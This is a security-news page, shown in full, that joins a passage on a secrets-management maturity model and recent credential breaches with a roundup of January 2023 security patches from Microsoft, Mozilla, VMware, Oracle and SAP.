*   CI/CD pipelines & artifacts
*   Runtime environments

We then built a maturity ramp-up over five levels, going from 0 (Uninitiated) to 4 (Expert). Going 0 to 1 is mostly about assessing the risks posed by insecure software development practices, and starting auditing digital assets for hardcoded credentials. At the intermediate level (level 2), secrets scanning is more systematic, and secrets are cautiously shared across the DevOps lifecycle. Levels 3 (Advanced) and 4 (Expert) are focused on risk mitigation with clearer policies, better controls, and increased shared responsibility for remediating incidents.

Another core consideration for this framework is that making it hard to use secrets in a DevOps context will inevitably lead to the bypassing of the protective layers in place. As with everything else in security, the answers lay between protection and flexibility. This is why the use of a vault/secrets manager starts at the intermediate level only. The idea is that the use of a secrets manager should not be seen as a stand-alone solution but as an additional layer of defense. To be effective, it requires other processes, like continuous scanning of pull requests, to be mature enough.

Here are some questions that this model should raise in order to help you evaluate your maturity: how frequently are your production secrets rotated? How easy is it to rotate secrets? How are secrets distributed at the development, integration, and production phase? What measures are put in place to prevent the unsafe dissemination of credentials on local machines? Do CI/CD pipelines' credentials adhere to the least privileges principle? What are the procedures in place for when (not if) secrets are leaked?

Reviewing your secrets management posture should be top of mind in 2023. First, everyone working with source code has to handle secrets, if not daily, at least once in a while. Secrets are no longer the prerogative of security or DevOps engineers. They are required by more and more people, from ML engineers, data scientists, product, ops, and even more. Second, if you don't find where your secrets are, hackers will.

**Hackers will find your secrets**

The risks posed to organizations failing to adopt mature secrets management practices cannot be overstated. Development environments, source code repositories and CI/CD pipelines have become favorite targets for hackers, for whom secrets are a gateway to lateral movement and compromise.

Recent examples highlight the fragility of secrets management even in the most technologically mature organizations.

In September 2022, an attacker got access to Uber's internal network, where he found hardcoded admin credentials on a network drive. The secrets were used for logging in to Uber's privileged access management platform, where many more plaintext credentials were stored throughout files and scripts. The attacker was then able to take over admin accounts in AWS, GCP, Google Drive, Slack, SentinelOne, HackerOne, and more.

In August of the same year, the password manager LastPass fell victim of an attacker who gained access toits development environment by stealing the credentials of a software developer and impersonating that individual. Later in December, the firm disclosed that someone used that information to steal source code and customer data.

In fact, in 2022, source code leaks have proven to be a true minefield for organizations: NVIDIA, Samsung, Microsoft, Dropbox, Okta, and Slack, among others, have been victims of source code leaks. In May, we were warning about the important volume of credentials that could be harvested by analyzing these codebases. Armed with these, attackers can gain leverage and pivot into hundreds of dependent systems in what is known as supply chain attacks.

Finally, even more recently, in January 2023, the continuous integration provider CircleCI was also breached, leading to the compromise of hundreds of customer environment variables, tokens, and keys. The company urged its customers to immediately change their passwords, SSH keys, or any other secrets stored on or managed by the platform. Still, victims need to find out where these secrets are and how they are being used to press the emergency button!

This was a strong case for having an emergency plan ready to go.

The lesson from all these incidents is that attackers have realized that compromising machine or human identities gives a higher return on investment. They are all warning signs of the urgency to deal with hardcoded credentials and to dust off secrets management in general.

**Final word**

We have a saying in cybersecurity: "encryption is easy, but key management is hard." This still holds true today, although it isn't just about encryption keys anymore. Our hyper-connected services world relies on hundreds of types of keys, or secrets, to function properly. These could be as many potential attack vectors if mismanaged.

Knowing where your secrets are, not just in theory but in practice, and how they are used along the software development chain is crucial for security. To help you, we created a maturity model specifically about secrets distribution, leak detection, remediation process, and rotation habits.

The first step is always to get a clear audit of the organization's security posture regarding secrets: where and how are they used? Where do they leak? How to prepare for the worst? This alone could prove to be a lifesaver in an emergency situation. Find out where you stand with the questionnaire and learn where to go from there with the white paper.

In the wake of recent attacks on development environments and business tools, companies that want to defend themselves effectively must ensure that the grey areas of their development cycle are cleared as soon as possible.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

You Don't Know Where Your Secrets Are

January saw a slew of security patches for iOS, Chrome, Windows, and more.

The Android security patch is available to Google’s Pixel devices, which have their own specific updates, and Samsung’s Galaxy range, including Samsung Galaxy Note 10, Galaxy S21, and Galaxy A73. You can check for the update in your settings.

Microsoft Patch Tuesday

Microsoft fixed a rather hefty 98 security issues in its first Patch Tuesday of the year, including an already exploited vulnerability: CVE-2023-21674 is an elevation of privilege flaw impacting the Windows Advanced Local Procedure Call that could lead to browser sandbox escape. 

By exploiting the bug, an adversary could gain System privileges, Microsoft wrote, confirming that the flaw has been detected in real-life attacks.

Another elevation of privilege vulnerability in the Windows Credential Manager User Interface, CVE-2023-21726, is relatively easy to exploit and doesn’t require any interaction from the user.

January’s Patch Tuesday also saw Microsoft fix nine Windows Kernel vulnerabilities, eight of which are elevation of privilege issues and one information disclosure vulnerability.

Mozilla Firefox

Software firm Mozilla has released important updates for its Firefox browser, the most serious of which have been the subject of a warning by the US Cybersecurity and Infrastructure Security Agency (CISA). 

Among the 11 flaws fixed in Firefox 109 are four rated as having a high impact, including CVE-2023-23597, a logic bug in process allocation that could allow adversaries to read arbitrary files. Meanwhile, Mozilla said its security team found memory safety bugs in Firefox 108. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort, some could have been exploited to run arbitrary code,” it wrote.

An attacker could exploit some of these vulnerabilities to take control of an affected system, CISA said in its advisory. “CISA encourages users and administrators to review Mozilla’s security advisories for Firefox ESR 102.7 and Firefox 109 for more information and apply the necessary updates.”

VMWare

Enterprise software maker VMWare has published a security advisory detailing four flaws affecting its VMware vRealize Log Insight product. Tracked as CVE-2022-31706, the first is a directory traversal vulnerability with a CVSSv3 base score of 9.8. By exploiting the flaw, an unauthenticated, malicious actor could inject files into the operating system of an impacted appliance, resulting in RCE, VMWare says.

Meanwhile, a broken access control RCE vulnerability tracked as CVE-2022-31704 also has a CVCCv3 base score of 9.8. It goes without saying that those impacted by these vulnerabilities should patch as soon as possible.

Oracle

Software giant Oracle has released patches for a whopping 327 security vulnerabilities, 70 of which are rated as having a critical impact. Worryingly, 200 of the issues patched in January can be exploited by a remote unauthenticated attacker.

Oracle is recommending that people update their systems as soon as possible, warning that it has received reports of “attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches.”

In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches, it says.

SAP

SAP’s January Patch Day has seen the release of 12 new and updated security notes. With a CVSS score of 9.0, CVE-2023-0014 is rated as the most severe bug by security firm Onapsis. The flaw affects the majority of all SAP customers and its mitigation is a challenge, Onapsis says. 

The capture-replay vulnerability is a risk because it could allow malicious users to obtain access to an SAP system. “Complete patching of the vulnerability includes applying a kernel patch, an ABAP patch, and a manual migration of all trusted RFC and HTTP destinations,” Onapsis explains.

Tag

#google